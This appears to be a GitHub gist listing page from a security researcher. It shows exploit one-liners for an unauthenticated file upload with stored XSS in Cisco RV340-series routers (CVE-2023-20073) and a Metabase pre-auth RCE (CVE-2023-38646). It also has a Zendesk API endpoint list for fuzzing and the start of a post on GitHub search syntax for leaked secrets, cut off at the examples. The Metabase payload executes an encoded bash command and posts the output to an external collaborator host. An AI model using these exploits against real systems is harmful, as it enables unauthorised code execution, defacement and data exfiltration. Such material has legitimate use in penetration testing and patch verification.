Bipin Jitiya win3zz

@win3zz
win3zz / CVE-2023-20073.sh
Created August 18, 2023 16:56
Unauthenticated Arbitrary File Upload and Stored XSS in Cisco RV340, RV340W, RV345, RV345P VPN Routers (CVE-2023-20073)
TARGET="https://0.0.0.0"; \
FILENAME="login.html"; \
echo "<b>CVE-2023-20073</b> exploit test.<br><script>alert('JS-test')</script>" > $FILENAME; \
curl -ksX POST "$TARGET/api/operations/ciscosb-file:form-file-upload" -H "Authorization: 1" -F "pathparam=Portal" -F "fileparam=${FILENAME}" -F "file.path=${FILENAME}" -F "file=@${FILENAME};type=application/octet-stream"; \
echo "Access the uploaded file through the following link: $TARGET/$FILENAME"
@win3zz
win3zz / CVE-2023-38646.sh
Created July 28, 2023 16:32
Metabase Pre-auth RCE (CVE-2023-38646)
TARGET="http://127.0.0.1:3000"; \
COLLABORATOR="http://xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.oastify.com/"; \
COMMAND="uname -a"; \
ENCODED_COMMAND=$(echo -n "curl -X POST -d \"\$(${COMMAND})\" ${COLLABORATOR}" | base64 | tr -d '\n' | sed 's/=/%3D/g'); \
SETUP_TOKEN=$(curl -s "${TARGET}/api/session/properties" | jq -r '.["setup-token"]'); \
PAYLOAD='{"token":"'${SETUP_TOKEN}'","details":{"details":{"db":"zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER test BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('\''bash -c {echo,'${ENCODED_COMMAND}'}|{base64,-d}|{bash,-i}'\'')\n$$--=x","advanced-options": false},"engine":"h2"}}'; \
curl -X POST -H "Content-Type: application/json" -d "${PAYLOAD}" "${TARGET}/api/setup/validate"
@win3zz
win3zz / zendesk_endpoints.txt
Created July 18, 2023 09:01
List of Zendesk API Endpoints for Fuzzing [Penetration Testing]
POST /api/v2/accounts
GET /api/v2/activities?since=cstest
GET /api/v2/audit_logs?filter[source_type]=cstest&filter[source_id]=1&filter[actor_id]=1&filter[ip_address]=cstest&filter[created_at]=cstest&filter[action]=cstest&sort_by=cstest&sort_order=cstest&sort=cstest
GET /api/v2/automations
POST /api/v2/automations
GET /api/v2/bookmarks
POST /api/v2/bookmarks
GET /api/v2/brands
POST /api/v2/brands
GET /api/v2/custom_objects

GitHub Search Syntax for Finding API Keys/Secrets/Tokens

As a security professional, it is important to conduct thorough reconnaissance. With the increasing use of APIs, keeping access tokens and other API-related secrets secure has become paramount in order to prevent leaks. Despite technological advances, however, human error remains a factor: many developers still unknowingly hardcode API secrets into source code and commit them to public repositories. GitHub, being a widely used platform for public code repositories, may inadvertently host such leaked secrets. To help identify these exposures, I have created a comprehensive search list using GitHub's search syntax that surfaces thousands of leaked keys and secrets in a single query.

Search Syntax:

(path:*.{File_extension1} OR path:*.{File_extension-N}) AND ({Keyname1} OR {Keyname-N}) AND (({Signature/pattern1} OR {Signature/pattern-N}) AND ({PlatformTag1} OR {PlatformTag-N}))

Examples:

**1.